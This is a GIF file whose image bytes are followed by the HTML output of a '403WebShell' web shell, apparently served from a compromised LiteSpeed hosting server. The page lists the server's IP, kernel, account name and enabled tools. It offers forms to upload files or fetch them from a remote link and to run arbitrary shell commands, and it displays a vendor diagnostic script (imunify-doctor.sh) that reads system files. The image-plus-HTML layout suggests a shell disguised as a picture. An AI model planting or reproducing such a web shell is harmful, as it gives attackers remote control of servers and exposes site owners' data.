GIF89a=
( õ' 7IAXKgNgYvYx\%wh…hŽth%ˆs%—x¨}9®Œ©€&©‰%¶†(¹–.¹5·œD¹&Çš)ÇŸ5ǘ;Í£*È¡&Õ²)ׯ7×µ<Ñ»4ï°3ø‘HÖ§KͯT÷¨Yÿšqÿ»qÿÔFØ                                                                           !ù

 ' !ÿ
NETSCAPE2.0
   ,    =
(  þÀ“pH,È¤rÉl:ŸÐ¨tJ­Z¯Ø¬vËíz¿à°xL.›Ïè´zÍn»ßð¸|N¯Ûïø¼~Ïïûÿ€‚ƒ„…†‡ˆ‰Š‹ŒŽ‘’“”•–—˜™š›œžŸ ¡¢£¤¥¦§gª«ªE
¯°
¨¬ª±²Œ¹º¹E¾­”´ÂB¶¯ §Åȸ»ÑD¾¿Á•ÄÅ®° ÝH¾ÒLÀÆDÙ«D¶BÝïðÀ¾DÑÑÔTÌÍíH òGö¨A RÎڐ
|¥ÂÙ­&ºìE8œ¹kGÔAÞpx­a¶­ãR2XB®åE
8I€Õ6Xî:vT)äžþÀq¦è³¥ì仕F~%xñ Â
4#ZÔ‰O|-4Bs‘X:=
QÉ œš lºÒyXJŠGȦ|s
hÏíK–3l7·B|¥$'7Jީܪ‰‡àá”Dæn=Pƒ
¤Òëí‰`䌨ljóá¯Éüv>á–Á¼5
½.69ûϸd«­ºÀûnlv©‹ªîf{¬ÜãPbŸ
 l5‘Ž¯pß´
˜3aÅùäI«O’ý·‘áÞ‡˜¾Æ‚ÙÏiÇÿ‹Àƒ #öó)pâš Þ½	‘Ý{ó)vmÞü%D~6f s}ŃƒDØW Eþ`‡þ	À…L8xá†ç˜{)x`X/> Ì}mø‚–RØ‘*|`D=‚Ø_ ^ð5 !_…'aä“OÚ—7âcð`D”Cx`ÝÂ¥ä‹éY¹—F¼¤¥Š?¡Õ™ n@`}	lď’ÄÉ@4>ñd
œ à‘vÒxNÃ×™@žd=ˆgsžG±æ´²æud &p8Qñ)ˆ«lXD©øÜéAžHìySun jª×k*D¤LH]
†¦§C™Jä–´Xb~ʪwStŽ6K,°£qÁœ:9ت:¨þªl¨@¡`‚ûÚ	».Û¬¯
t‹ÆSÉ[:°=Š‹„‘Nåû”Ìî{¿ÂA ‡Rà›ÀÙ6úë°
Ÿð0Ä_ 
½;ÃϱîÉì^ÇÛÇ#Ëë¼ôº!±Ä˜íUîÅÇ;0L1óÁµö«p%
AÀºU̬ݵ¼á%霼€‡¯Á~`ÏG¯»À×
 ­²± =4ªnpð3¾¤³¯­ü¾¦îuÙuµÙ®|%2ÊIÿür¦#0·ÔJ``8È@S@5ê¢ö×Þ^`8EÜ]
ý.뜃Âç 7 ú ȉÞj œ½Dç 
zý¸iþœÑÙûÄë!ˆÞÀl§Ïw‹*DçI€nEX¯¬¼	&A
¬Go¼QföõFç°¯;é¦÷îŽêJ°îúôF5¡ÌQ|îúöXªæ»TÁÏyñêï]ê² o óÎC=öõ›ÒÓPB@ D×½œä(>èCÂ
xŽ`±«Ÿ–JЀ»Û á¤±p+eE0`ëŽ`AÚ/NE€Ø†À9‚@¤à	H½7”à‡%B‰`À
l*ƒó‘–
‡8 2ñ%¸ —€:Ù1Á‰E¸àux%
nP1ð!‘ðC)¾P81lÑɸF#ˆ€{´âé°ÈB„0>±û
°b¡Š´±O‚3È–Ù()yRpbµ¨E.Z‘D8ÊH@%òŒx+%Ù˜Æcü »¸˜fõ¬b·d`Fê™8èXH"ÉÈ-±|1Ô6iI, 2““¬$+](A*jÐQTÂ
o‰.ÛU슬Œã„Ž`¯SN¡–¶Äåyše¯ª’­¬‚´b¦Éož œ)åyâ@Ì®3	ÎtT̉°&Ø+žLÀf"Ø-|žçÔ>‡Ðv¦Ðžì\‚ Q1)Ž@Žh#aP72”ˆ™¨$‚  !ù

 " ,    =
( …7IAXG]KgNgYvYxR"k\%w]'}hŽth%ˆg+ˆs%—r.—m3šx3˜x¨}9®€&©€+¨‡7§‰%¶†(¹–.¹œD¹&ǘ;Í•&ײ)×»4ïÌ6ò§KÍ                                                                                          þ@‘pH,È¤rÉl:ŸÐ¨tJ­Z¯Ø¬vËíz¿à°xL.›Ïè´zÍn»ßð¸|N¯Ûïø¼~Ïïûÿ€‚ƒ„…†‡ˆ‰Š‹ŒŽ‘’“”•–—˜™š›œžŸ ¡¢£¤¥¦§g
 «¬ E 
±±
¨­¶°ººE
Á´”·®C¬²
§Ç¶
Œ»ÓDÃÕƷ¯Ê±H½ºM×ÁGÚ¬D¶BËÁ½î½DÓôTÏÛßîG»ôõC×CÌ	l&âž:'òtU³6ɹ#·Ø)€'Ü.6±&ëÍÈ»
K(8p0N?!æ2"ÛˆNIJX>R¼ÐO‚M	'¡¨2¸*Ÿþ>#nâ†
å@‚<[:¡Iïf’ ¤TÚ˘CdbÜÙ“[«ŽEú5MBo¤
×@€`@„€Êt W-3 ¶Ÿ¡BíêäjIÝ…Eò9[T…$íêﯧ„…•s»Óȳ¹€ÅÚdc®UUρ#±Ùïldj?´í¼²`\ŽÁðÞu|3'ÖŒ]ë6 ¶S#²‡˜FKLÈ *N
E´‘áäŠ$˜›eÄYD„ºq«.è촁ƒs \-ÔjA9²õ÷å- üúM[Âx(ís÷ì®x€|í¡Ù’p¦
‚ ŽkÛTÇDpE@WÜ	²Ç]kŠ1¨ þ€·Yb ÓÁ‰l°*n0 ç™—žzBdОu¾7ĉBl€â‰-ºx~|UåU‰
 h*Hœ|e"#"?vpÄiŠe6^ˆ„+qâŠm8  #VÇá <Fù–C™Ä^F9Ä #­ÉRAGb©d“(0$kêè‘ž¨'L¢)B]æù¨eŠ>‘å–ÄV„œ|Šè•m"сœn|@
›U¶ÆΞ—Špb¥G¨ED”€±Úê2FÌIç?
>Éxå
α
¡¤„%‘žjŸ‘ꄯ<Ìaà9ijÐ2˜D¦È&›†Z`‚å]wþ¼Â:ç6àB¤7eFJ|õÒ§Õ,¨äàFÇ®cS·Ê¶+B°,‘Þ˜ºNûãØ>PADÌHD¹æž«ÄÀnÌ¥}­#Ë’ë
QÀÉSÌÂÇ2ÌXÀ{æk²
lQÁ2«ÊðÀ¯w|2Íh‹ÄÂG€,m¾¶ë3ÐÙ6-´ÅE¬L°ÆIij*K½ÀÇqï`DwVÍQXœÚÔpeœ±¬Ñ	q˜§Tœ½µƒ°Œìu Â<¶aØ*At¯lmEØ
üôÛN[P1ÔÛ¦­±$ÜÆ@`ùåDpy¶yXvCAyåB`ŽD¶	0QwG#¯
æš[^Äþ	$ÀÓÝǦ{„L™[±úKÄgÌ;ï£S~¹ìGX.ôgoT.»åˆ°ùŸûù¡?1zö¦Ÿž:ÅgÁ|ì<O»í!‹œ{÷E ÿ{ðVðÚú×Cß{òËgo„óõú’'߁zEHÔrJÅ=˜5€Ýé²¥ºá¹î4Â÷ˆÐ´V	w ƒß$xVA.¬+üä'ÊE„E ^ž‡©£•84`K—>L¹„®£œŠ‚à0œ]PÁ^p	F<"•ç?!,ñ‡N4—…PÄ Á„ö¨Û:Tè@hÀ‹%táÿ:ø-
žI<`þ‹p I….)^ 40D#p@ƒj4–؀:²‰1Øâr˜¼F2oW¼#Z†;$Q	q”
‘ ÂK¦ñNl#29 !’F@¥Bh·ᏀL!—XFóLH‘Kh¤.«hE&JòG¨¥<™WN!€ÑÙÚˆY„@†>Œž19J" 2,/
&.GXB%ÌRÈ9B6¹W]’î×ÔW¥’IÎ$ ñ‹ÓŒE8YÆ	¼³™ñA5“à®Q.aŸB€&Ø©³ JÁ—!	¦t)K%tœ-¦JF
bòNMxLôþ)ÐR¸Ð™‘ èÝ6‘O!THÌ„HÛ	‰   !ù

 ) ,    =
( …AXKgNgYvYxR"k\%wh…hŽh%ˆg+ˆs%—r.—x3˜x¨}9®€&©€+¨Œ,©‡7§‰%¶†(¹–.¹5·&Çš)ǘ;Í•&×£*Ȳ)ׯ7×»4ï°3øÌ6ò‘HÖ§KÍ»Hó¯T÷¨Yÿ»qÿÇhÿ                                                                     þÀ”pH,È¤rÉl:ŸÐ¨tJ­Z¯Ø¬vËíz¿à°xL.›Ïè´zÍn»ßð¸|N¯Ûïø¼~Ïïûÿ€‚ƒ„…†‡ˆ‰Š‹ŒŽ‘’“”•–—˜™š›œžŸ ¡¢£¤¥¦§g ª«

E$±²¨ª­
·
°²½$E$ÂÕ««D· Í ¿¦Ç¶¸ÌŒ¾³CÃÅÆ EééH½MÛÂGâªD­çBêêϾD²ÒaÀà€Š1r­ðÓ¤	ÔožzU!L˜C'¾yW½UGtäÇïÙllê
0×àÂuGþ)AÀs[þ·xì
ÁxO%ƒûX2ó—

P£n›R/¡ÑšHše+êDm?#—‘Ç£6¡8íJ¡ŸâDiäªM¥Ö„ôj“¬¹£5oQ7°-
<‡
*´lãÓŒ2r/a!l)dÈ A™ÈE¢ôÔ͆…ð;Ö˜c ¡%ß‚’Ùˆâ¸b½—pe~C"BíëÚHïeF2§æŠ8qb t_`urŠeü
wÅu3êæPv§h•"ß`íÍxçLĹÜÖ3á
 ~Öº“®›¸ÏMDfJÙ
°„
ÛµáWõ%§œ‚à©–‚X Ó؁)@®Ñ›Eþ´wëuÅSxb8y\mÖzœ¥§ZbºE—ÂLªÌw!y(>¡™wú=Ç|ÅÝs¢d€CÁW)HÜcC$€L 
Ä7„r.á\{)@ð` @	äXÈ$PD” `šaG:§æˆOˆ72EÐamn]ù"ŒcÊxÑŒ° &dR8`g«iÙŸLR!¦
P
…d’ä¡“¦ðÎTƒ¦ià|À
 _

¥ Qi#¦Šg›Æ ›noMµ
›V
ã£)p ç£ÎW…š=Âeªk§†j„ ´®1ß²sÉxéW«jšl|0¯B0Û, 
\jÛ´›6±¬¶C
ÛíWþï|ëÙ‹¸ñzĸV {ì;Ýñn¼òVˆm³I¼³.Ðã¤PN¥
²µ¼„µCã+¹ÍByî£Ñ¾HŸ›ëêÂ
7ìYÆFTk¨SaoaY$Dµœìï¿Ã29RÈkt Çïfñ ÇÒ:ÀÐSp¹3ÇI¨â¥DZÄ ü9Ïýögñ½­uÔ*
3)O‘˜Ö[_hv
,àî×EtŸé¶BH€Õ[ü±64M@ÔSÌM7dÐl5-ÄÙU܍´©zߌ3Ô€3ž„ „ ¶ÛPô½5×g›
êÚ˜kN„Ý…0Îj4€Ìë°“#{þÕ3S2çKÜ'ợlø¼Ú2K{° {Û¶?žm𸧠ËI¼nEò='êüóºè^üæÃ_Û=°óž‚ì#Oý¿Í'¡½áo..ÏYìnüñCœO±Áa¿¢Kô½o,üÄËbö²çºí
ï{ËC Ú—"”Ï{ËK ÍÒw„õ±Oz dÕ¨à:$ ƒô—«v»]	A#ð «€¿šéz)
Rx׿ˆ¥‚d``èw-îyÏf×K!ð€þ­Ð|ìPľ„=Ì`ý(f” 'Pa
¥ÐBJa%Ðâf§„%Š¡}FàáÝ×6>ÉäŠG"éŽè=ø!oŠ°^FP¼Ø©Q„ÀCÙÁ`(Ž\ÄÝ®
©Â$<n@dÄ E#ììUÒI! ‚#lù‹`k¦ÐÇ'Rró’ZýNBÈMF
Í[¤+‹ðɈ-áwj¨¥þ8¾rá
,VÂh„"|½œ=×G_¦Ñ™EØ 0i*%̲˜Æda0mV‚k¾)›;„&6 p>ÓjK“¦Ç#
âDÂ:ûc?:R	Ó¬fÞéI-Ì“•Ã<ä=™Ï7˜3œ¨˜c2ŒW	,
ˆ”8(T™P‰F¡Jhç"‚  ;<html>
<!doctypehtml><html><head><title>403WebShell</title><meta content="noindex"name="robots"></head><body bgcolor="#1f1f1f"text="#ffffff"><link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css"rel="stylesheet"><style>@import url(https://fonts.googleapis.com/css?family=Dosis);@import url(https://fonts.googleapis.com/css?family=Bungee);@import url(https://fonts.googleapis.com/css?family=Russo+One);body{font-family:Consolas,cursive;text-shadow:0 0 1px #757575}body::-webkit-scrollbar{width:12px}body::-webkit-scrollbar-track{background:#1f1f1f}body::-webkit-scrollbar-thumb{background-color:#1f1f1f;border:3px solid gray}#content tr:hover{background-color:#636263;text-shadow:0 0 10px #fff}#content .first{background-color:#5e5e5e}#content .first:hover{background-color:#25383c;text-shadow:0 0 1px #757575}table{border:1px #000 dotted;table-layout:fixed}td{word-wrap:break-word}a{color:#df5;text-decoration:none}a:hover{color:#000;text-shadow:0 0 10px #fff}input,select,textarea{border:1px #000 solid;-moz-border-radius:5px;-webkit-border-radius:5px;border-radius:5px}.gas{background-color:#1f1f1f;color:#fff;cursor:pointer}select{background-color:transparent;color:#fff}select:after{cursor:pointer}.linka{background-color:transparent;color:#fff}.up{background-color:transparent;color:#fff}option{background-color:#1f1f1f}.btf{background:0 0;border:1px #fff solid;cursor:pointer}::-webkit-file-upload-button{background:0 0;color:#fff;border-color:#fff;cursor:pointer}</style><center><font face="Bungee" size="5">403Webshell</font></center>
<table width="100%" border="0" cellpadding="3" cellspacing="1" align="center">
<tr><td>Server IP : <font color=#df5>172.67.177.218</font> &nbsp;/&nbsp; Your IP : <font color=#df5>216.73.216.82</font><br>Web Server : <font color='#df5'>LiteSpeed</font><br>System : <font color='#df5'>Linux premium229.web-hosting.com 4.18.0-553.45.1.lve.el8.x86_64 #1 SMP Wed Mar 26 12:08:09 UTC 2025 x86_64</font><br>User : <font color='#df5'>akhalid&nbsp;</font>( <font color='#df5'>749</font>)<br>PHP Version : <font color='#df5'>8.3.22</font><br>Disable Function : <font color='#df5'>NONE</font></font><br>MySQL : <font color=red>OFF</font> &nbsp;|&nbsp; cURL : <font color=green>ON</font> &nbsp;|&nbsp; WGET : <font color=green>ON</font> &nbsp;|&nbsp; Perl : <font color=green>ON</font> &nbsp;|&nbsp; Python : <font color=green>ON</font> &nbsp;|&nbsp; Sudo : <font color=red>OFF</font> &nbsp;|&nbsp; Pkexec : <font color=red>OFF</font><br>Directory : &nbsp;<a href="?loknya=/">/</a><a href="?loknya=/opt">opt</a>/<a href="?loknya=/opt/imunify360">imunify360</a>/<a href="?loknya=/opt/imunify360/venv">venv</a>/<a href="?loknya=/opt/imunify360/venv/share">share</a>/<a href="?loknya=/opt/imunify360/venv/share/imunify360">imunify360</a>/<a href="?loknya=/opt/imunify360/venv/share/imunify360/scripts">scripts</a>/</td></tr><tr><td><br>Upload File : <form enctype="multipart/form-data" method="post">
<input type="radio" value="1" name="dirnya" checked>current_dir [ <font color='red'>Writeable</font> ]
<input type="radio" value="2" name="dirnya" >document_root [ <font color='green'>Writeable</font> ]
<br>
<input type="hidden" name="upwkwk" value="aplod">
<input type="file" name="berkas"><input type="submit" name="berkasnya" value="Upload" class="up" style="cursor: pointer; border-color: #fff"><br>
<input type="text" name="darilink" class="up" placeholder="https://linuxploit.com/upload.txt">&nbsp;<input type="text" name="namalink" class="up" size="5" placeholder="kerang.txt"><input type="submit" name="linknya" class="up" value="Upload" style="cursor: pointer; border-color: #fff">
</form><br><form method="post" enctype="application/x-www-form-urlencoded">
Command : <input type="text" name="komend" class="up" style="cursor: pointer; border-color: #000" value="">
<input type="submit" name="komends" value=">>" class="up" style="cursor: pointer; border-color: #fff">
</form></table><br><hr><center style="font-family: Russo One">[ <a href='/228ef4/index.php'>Back</a> ]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<hr></center><br><tr><td>Current File : /opt/imunify360/venv/share/imunify360/scripts/imunify-doctor.sh</tr></td></table><br/><pre>#!/bin/bash
VERSION=&quot;8.5.1&quot;
LC_ALL=en_US.UTF-8
LANG=en_US.UTF-8
LANGUAGE=en_US.UTF-8
DEST=/root/cl-report
UPLOAD_URL=https://doctor.cloudlinux.com/doctor/upload
CAT=`command -v cat`
UNAME=`command -v uname`
CP=&quot;Unknown&quot;
SERVER_ID=
main_ip=&#039;NA&#039;
scriptname=&quot;imunify-doctor&quot;
IMUNIFY360_PIDFILE=/var/run/imunify360.pid
IMUNIFY360_AGENT_PIDFILE=/var/run/imunify360-agent.pid
# custom tmp dir from imunify360.spec for symlink attack prevention
tmpdir=/var/imunify360/tmp
sqlite_path=/opt/alt/sqlite/usr/bin/sqlite3
IMUNIFY360_DB=/var/imunify360/imunify360.db
IMUNIFY360_RESIDENT_DB=/var/imunify360/imunify360-resident.db
IMUNIFY360_IPLIST_DB=/var/imunify360/imunify360-ipsetlists.db
db_command=&quot;$sqlite_path $IMUNIFY360_DB&quot;
db_command_resident=&quot;$sqlite_path $IMUNIFY360_RESIDENT_DB&quot;
db_command_iplist=&quot;$sqlite_path $IMUNIFY360_IPLIST_DB&quot;


cleanup() {
  rm -f $DEST $DEST.wget
}

test_curl() {
    command -v curl &gt;/dev/null 2&gt;&amp;1
    return $?
}

test_wget() {
  command -v wget &gt;/dev/null 2&gt;&amp;1
  if [ 0 -eq $? ]; then
    if [ -x `command -v wget` ]; then
	return 0
    fi
  fi
  return 1
}

curl_upload() {
 curl -s -H &quot;serverid: $SERVER_ID&quot; -F reportfile=@&quot;$DEST&quot; $UPLOAD_URL
}

wget_upload() {

    echo -e &quot;--FILEUPLOAD\r\n&quot; &gt; $DEST.wget
    echo -e &quot;--FILEUPLOAD\r\n&quot; &gt; $DEST.wget
    echo -e &quot;Content-Disposition: form-data; name=\&quot;reportfile\&quot;; filename=\&quot;$DEST\&quot;\r\n&quot; &gt;&gt; $DEST.wget
    echo -e &quot;Content-Type: application/octet-stream\r\n&quot; &gt;&gt; $DEST.wget
    echo -e &quot;Media Type: application/octet-stream\r\n\r\n&quot; &gt;&gt; $DEST.wget
    cat $DEST &gt;&gt; $DEST.wget
    echo -e &quot;--FILEUPLOAD--\r\n&quot; &gt;&gt; $DEST.wget
    wget -O - -qq -t 1 --header=&quot;serverid: $SERVER_ID&quot; --header=&quot;Content-type: multipart/form-data; boundary=FILEUPLOAD&quot; --post-file $DEST.wget $UPLOAD_URL
}

get_server_id() {
  SERVER_ID=$(/opt/imunify360/venv/bin/python -c &#039;import json; import sys; print(json.load(sys.stdin)[&quot;id&quot;])&#039; &lt; /var/imunify360/license.json)
  if [[ -z &quot;$SERVER_ID&quot; ]]; then
    SERVER_ID=&quot;${main_ip//./_}&quot;
  fi
}

init_main_ip() {
 if test_curl
 then
    main_ip=`curl -s -L http://cloudlinux.com/showip.php` 2&gt;/dev/null
 else
    main_ip=`wget -qq -O - http://cloudlinux.com/showip.php` 2&gt;/dev/null
 fi
}

get_main_ip() {
  sep &quot;Main IP&quot;
  echo &quot;$main_ip&quot; &gt;&gt; $DEST
  echo &gt;&gt;$DEST
}


upload() {
 if test_curl
 then
     curl_upload
 else
     wget_upload
 fi
}

report_error_and_exit() {
 echo &quot;$1&quot;
 exit 1
}

mecho(){
 echo $1 &gt;&gt; $DEST
}
start(){
 if ! test_wget; then
     if ! test_curl; then
	 echo &quot;Cannot find wget or curl&quot;
     fi
     #echo &quot;Using curl&quot;
 fi
 echo &quot;------ CL INFO ---&quot; &gt; $DEST
}

time_stamp(){
 echo &quot;&quot; &gt;&gt; $DEST
 echo &quot;TS: $(date)&quot; &gt;&gt; $DEST
}

sep(){
 echo &quot;------ $1 ---&quot; &gt;&gt; $DEST
}


run(){
 sep &quot;$1&quot;
 sh -c &quot;$1&quot; &gt;&gt; $DEST 2&gt;&amp;1
 time_stamp
}

run_cb(){
 sep &quot;$1&quot;
 $1 &gt;&gt; $DEST 2&gt;&amp;1
 result=$?
 time_stamp
 return $result
}

dump() {
 sep &quot;cat $1&quot;
 $CAT $1  &gt;&gt; $DEST 2&gt;&amp;1
 echo &gt;&gt; $DEST 2&gt;&amp;1
 time_stamp
}


detect_cp() {
    CP_VERSION=&quot;Unknown&quot;
    SOFTACULOUS=0
    if [ -d &quot;/usr/local/psa/admin/&quot; ]; then
	    CP=&quot;Plesk&quot;
        CP_VERSION=`cat /usr/local/psa/version`
	    if [ -e &quot;/usr/local/softaculous&quot; ]; then SOFTACULOUS=1; fi
    fi
    if [ -d &quot;/usr/local/cpanel/whostmgr/docroot/&quot; ]; then
	    CP=&quot;cPanel&quot;
        CP_VERSION=`/usr/local/cpanel/cpanel -V`
	    if [ -e &quot;/usr/local/cpanel/whostmgr/cgi/softaculous&quot; ]; then SOFTACULOUS=1; fi
    fi
    if [ -d &quot;/usr/local/interworx/&quot; ]; then
	    CP=&quot;InterWorx&quot;
        CP_VERSION=`cat /usr/local/interworx/iworx.ini|grep version`
	    if [ -e &quot;/usr/local/softaculous&quot; ]; then SOFTACULOUS=1; fi
    fi
    if [ -d &quot;/usr/local/ispmgr/&quot; ]; then
	    CP=&quot;ISPmanager&quot;
        CP_VERSION=`/usr/local/ispmgr/bin/ispmgr -v`
	    if [ -e &quot;/usr/local/softaculous&quot; ]; then SOFTACULOUS=1; fi
    fi
    if [ -d &quot;/usr/local/directadmin/plugins/&quot; ]; then
	    CP=&quot;DirectAdmin&quot;
        CP_VERSION=`/usr/local/directadmin/custombuild/build versions|sed -n 2p|cut -d&quot;:&quot; -f2`
	    if [ -e &quot;/usr/local/directadmin/plugins/softaculous&quot; ]; then SOFTACULOUS=1; fi
    fi
    if [ -d &quot;/usr/local/hostingcontroller/&quot; ]; then
	    CP=&quot;Hosting Controller&quot;
	    if [ -e &quot;/usr/local/softaculous&quot; ]; then SOFTACULOUS=1; fi
    fi
    if [ -d &quot;/hsphere/shared&quot; ]; then
        CP=&quot;H-Sphere&quot;
    fi
    sep &quot;Control Panel&quot;
    mecho &quot;CP: $CP&quot;
    mecho &quot;VERSION: $CP_VERSION&quot;
    mecho &quot;SOFTACULOUS: $SOFTACULOUS&quot;
}

detect_httpd() {

    PERL_BIN=$(which perl 2&gt;&gt;/dev/null)

    echo
    echo &quot;HTTP Server Running Processes: &quot;
    echo

    IFS=$(echo -en &quot;\n\b&quot;)
    for proc in $(ps -eo pid,user,group,cmd 2&gt;&gt;/dev/null | egrep &quot;\b(httpd|apache2|litespeed|lshttpd)\b&quot; | grep -v &quot;egrep&quot;); do
        echo &quot;[$proc]&quot;
        proc_pid=$(echo &quot;$proc&quot; | awk &#039;{print$1}&#039;)
        echo &quot;Bin:&quot; $(readlink &quot;/proc/${proc_pid}/exe&quot; 2&gt;&gt;/dev/null)
        echo &quot;Environment:&quot;
        cat &quot;/proc/${proc_pid}/environ&quot;  2&gt;&gt;/dev/null | tr &#039;\0&#039; &#039;\n&#039; | head -30
        echo
    done
    unset IFS
    echo

    http_bins=$(ps -eo pid,comm 2&gt;&gt;/dev/null | egrep &quot;\b(httpd|apache2)\b&quot; | awk &#039;{print &quot;/proc/&quot;$1&quot;/exe&quot;}&#039; | xargs -n 1 readlink | uniq | egrep &quot;\b(httpd|apache2)\b&quot;)

    for http_bin in &quot;$http_bins&quot;; do

        if [ -z &quot;$http_bin&quot; ]; then
            continue
        fi

        echo &quot;HTTP Binary Info: &quot;
        echo -e &quot;$http_bin\n&quot;
        $http_bin -V 2&gt;&amp;1
        echo
        $http_bin -M 2&gt;&amp;1
        echo

        if [ -z &quot;$PERL_BIN&quot; ]; then
            continue
        fi

        httpd_root=$($http_bin -V | grep HTTPD_ROOT | cut -d= -f2 | tr -d &#039;&quot;&#039; )
        httpd_config=$($http_bin -V | grep SERVER_CONFIG_FILE | cut -d= -f2 | tr -d &#039;&quot;&#039; )

        if [ -z &quot;$httpd_config&quot; ]; then
            continue
        fi

        if [ ! ${httpd_config:0:1} = &quot;/&quot; ]; then
            httpd_config=&quot;$httpd_root/$httpd_config&quot;
        fi

        pl_script_path=&quot;$(dirname $(readlink -e &quot;$0&quot;))/mk_apache_conf_digest.pl&quot;
        if [ -e &quot;$pl_script_path&quot; ]; then
            echo &quot;Server Configs:&quot;
            $PERL_BIN &quot;$pl_script_path&quot; &quot;$httpd_config&quot; &quot;$httpd_root&quot; 2&gt;&gt;/dev/null
        fi

    done

}


http_server_info() {
    detect_httpd 2&gt;&gt;/dev/null | head -5000
}


backup_systems_info() {
    if [ ! -f /var/restore_infected/acronis_api_token.json ]; then
        echo &quot;/var/restore_infected/acronis_api_token.json: no such file.&quot;
    else
        echo &quot;/var/restore_infected/acronis_api_token.json: &quot;
        # &quot;username&quot;: &quot;AB-99658-51&quot;
        /opt/imunify360/venv/bin/python -m json.tool &lt; /var/restore_infected/acronis_api_token.json
    fi

    echo
    echo &quot;imunify360-agent backup-systems extended-status: &quot;
    imunify360-agent backup-systems extended-status -v --json | tee $tmpdir/backup_systems_info.$$
    /opt/imunify360/evnv/bin/python &gt;$tmpdir/backup_systems_info.$$.current &lt;&lt;ENDPY
import json
print(json.load(open(&quot;$tmpdir/backup_systems_info.$$&quot;))[&quot;items&quot;][&quot;backup_system&quot;])
ENDPY

    rm $tmpdir/backup_systems_info.$$
    rm $tmpdir/backup_systems_info.$$.current
}


webshield_selfcheck() {
    /usr/share/imunify360-webshield/self_check.py
}


pam_db_size() {
    mod_db_path=$(awk -F= &#039;$1 == &quot;mod_db_path&quot; {print $2}&#039; /etc/pam_imunify/i360.ini)
    du --human-readable --summarize &quot;$mod_db_path&quot;
}

version() {
    sep &quot;Version of doctor script&quot;
    echo &quot;Version: $VERSION&quot; &gt;&gt; $DEST
}

trap cleanup EXIT

start
version
init_main_ip
get_main_ip
get_server_id
detect_cp
run &quot;date&quot;
run &quot;$CAT /proc/cpuinfo&quot;
run &quot;$UNAME -a&quot;
run &quot;$UNAME -r&quot;
run &quot;$UNAME -m&quot;
run &quot;$UNAME -p&quot;
run &quot;$UNAME -o&quot;
dump &quot;/etc/redhat-release&quot;
dump &quot;/etc/os-release&quot;
dump &quot;/var/imunify360/license.json&quot;
dump &quot;/etc/sysconfig/imunify360/imunify360.config&quot;
dump &quot;/etc/sysconfig/imunify360/imunify360-merged.config&quot;
run &quot;tail -n +1 /etc/sysconfig/imunify360/imunify360.config.d/*&quot;
dump &quot;/etc/sysconfig/imunify360/cpanel/imunify360.conf&quot;
run &quot;ls -lhaR /var/lib/unified-access-logger&quot;
run &quot;du -hs0 /var/lib/unified-access-logger&quot;
run &quot;tail -n3000 /var/log/imunify360/console.log&quot;
run &quot;tail -n3000 /var/log/imunify360/debug.log&quot;
run &quot;tail -n3000 /var/log/imunify360/network.log&quot;
run &quot;tail -n3000 /var/log/imunify360/acronis-installer.log&quot;
run &quot;tail -n3000 /var/log/imunify360/error.log&quot;
run &quot;tail -n3000 /var/log/imunify360-webshield/access.log&quot;
run &quot;tail -n3000 /var/log/imunify360-webshield/error.log&quot;
run &quot;tail -n3000 /var/ossec/logs/alerts/alerts.log&quot;
run &quot;tail -n3000 /usr/local/directadmin/custombuild/custombuild.log&quot;
run &quot;tail -n3000 /var/log/patchman/patchman.log&quot;
dump &quot;/etc/issue&quot;
dump &quot;/etc/sysconfig/kernel&quot;
dump &quot;/etc/sysconfig/kcare/systemid&quot;
dump &quot;/proc/uptime&quot;
dump &quot;/proc/loadavg&quot;
dump &quot;/proc/vmstat&quot;
dump &quot;/proc/devices&quot;
dump &quot;/proc/diskstats&quot;
dump &quot;/proc/cmdline&quot;
dump &quot;/proc/mdstat&quot;
dump &quot;/proc/meminfo&quot;
dump &quot;/proc/swaps&quot;
dump &quot;/proc/filesystems&quot;
dump &quot;/proc/mounts&quot;
dump &quot;/proc/interrupts&quot;
dump &quot;/boot/grub/grub.conf&quot;
dump &quot;/proc/version&quot;
dump &quot;/etc/passwd&quot;

run &quot;ls -la /etc/apt/sources.list.d/&quot;
run &quot;tail -n 50 /etc/apt/sources.list.d/*imunify*&quot;
run &quot;ls -la /etc/apt/preferences.d/&quot;
run &quot;tail -n 50 /etc/apt/preferences.d/*&quot;

run &quot;zgrep -C 5 imunify /var/log/apt/history.log*&quot;
run &quot;zgrep -C 5 imunify /var/log/apt/term.log*&quot;
run &quot;apt policy imunify360-firewall&quot;

run &quot;ls -la /etc/yum.repos.d/&quot;
run &quot;tail -n 50 /etc/yum.repos.d/{*imunify360*,*sensor*}&quot;
run &quot;grep DEFAULT /etc/default/grub&quot;
run &quot;grep vmlinuz /boot/grub2/grub.cfg| sed &#039;s/root=.*//&#039;&quot;
dump &quot;/boot/grub2/grub.cfg&quot;
dump &quot;/proc/zoneinfo&quot;
run &quot;ls /etc/grub.conf /boot/grub/grub.conf /boot/grub/menu.lst&quot;
run &quot;ls -l /boot&quot;
run &quot;grep Port /etc/ssh/sshd_config&quot;
run &quot;dmidecode&quot;
run &quot;systemd-detect-virt&quot;
run &quot;virt-what&quot;
run &quot;ipcs -m|sed -e s/-/=/g&quot;
run &quot;sysctl -a&quot;
dump &quot;/etc/sysctl.conf&quot;
run &#039;rpm -q -a --queryformat=&quot;%{N}|%{V}-%{R}|%{arch}\n&quot;&#039;
packages=$(rpm -qa imunify* 2&gt;&gt;/dev/null)
for package in $packages; do
    run &quot;rpm -V $package&quot;
done

run &quot;dpkg -l&quot;
run &quot;tail -n10000 /var/log/messages&quot;
run &quot;ls -lR /var/cache/kcare/&quot;
dump &quot;/etc/sysconfig/kcare/kcare.conf&quot;
dump &quot;/etc/kdump.conf&quot;
run &quot;/opt/imunify360/venv/bin/python -m pip freeze&quot;
[[ -f &quot;$IMUNIFY360_PIDFILE&quot; ]] &amp;&amp; run &quot;echo ${IMUNIFY360_PIDFILE}; ls -l /proc/$(cat ${IMUNIFY360_PIDFILE})/fd&quot;
[[ -f &quot;$IMUNIFY360_AGENT_PIDFILE&quot; ]] &amp;&amp; run &quot;echo ${IMUNIFY360_AGENT_PIDFILE}; ls -l /proc/$(cat ${IMUNIFY360_AGENT_PIDFILE})/fd&quot;


run &quot;df -h&quot;
dump &quot;/etc/userdomains&quot;

run &quot;ps aux --sort=-%mem | head -20&quot;
run &quot;ps aux --sort=-%cpu | head -20&quot;
run &quot;ps aux | grep -i imunify&quot;

run &quot;crontab -l&quot;
run &quot;service imunify360 status&quot;
run &quot;service imunify-antivirus status&quot;
run &quot;service imunify360-webshield status&quot;
run &quot;service wsshdict status&quot;
